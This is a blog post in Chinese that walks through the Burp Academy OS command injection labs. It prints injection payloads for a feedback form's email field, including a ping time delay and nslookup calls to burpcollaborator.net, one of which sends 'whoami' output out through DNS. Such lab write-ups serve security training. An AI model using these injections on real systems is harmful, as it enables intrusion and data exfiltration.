Burp学院-OS命令注入
2024-09-08 19:28:20
1.OS command injection, simple case。
最简单的命令执行,【|】 两个只要有一个为True就执行
2.Blind OS command injection with time delays
有时间延迟的盲命令注入
点击Submits feedback
email里先截断||再输入命令再隔离||
123@123.123||ping+-c+10+127.0.0.1||
3.Blind OS command injection with output redirection
带输出重定向的盲命令注入
先通过email写入一个文件,然后通过加载图片的filename调用该文件
首页抓包修改filename参数命令注入:
这里必须写入output.txt,其他没有的文件无法读取: no such file
4.Blind OS command injection with out-of-band interaction
带外交互的盲命令注入,需要使用Burp Collaborator
email=x||nslookup+burpcollaborator.net||
或
||nslookup+6mt98naz1z5qfv5laxona3nh68cy0n.burpcollaborator.net||
5.Blind OS command injection with out-of-band data exfiltration
带外数据渗透的盲命令注入,需要使用Burp Collaborator
email=||nslookup+`whoami`.YOUR-SUBDOMAIN-HERE.burpcollaborator.net||
+必须有,【`whoami`.】必须有。输出格式是whoami.client
最新文章
- MailKit系列之---查询SearchQuery
- Html中<;font>;标签的使用
- Node.js process 模块常用属性和方法
- ubuntu下安装JDK并搭建activeMQ
- Noip2016のmengbier
- Objective-C学习笔记-第一天(3)
- PHP中header用法详解带范例(转)
- Jenkins iOS – Git, xcodebuild, TestFlight
- SQL Server执行计划
- linux配置记录
- 如何在通过knockout数据绑定的DOM元素上添加事件
- input复选框操作的部分高频率使用代码
- 再好好聊聊 HTTP 里的 Cookie | 实用 HTTP
- 神州数码NAT地址转换配置
- Luffy之登录认证以及JWT
- 删除Git管理的文件
- 剑指offer编程题Java实现——面试题4后的相关题目
- 微信小程序——倒计时功能
- wildfly8+jpa EntityBean 简单入门
- Android系列教程(十六) 在电脑上装Android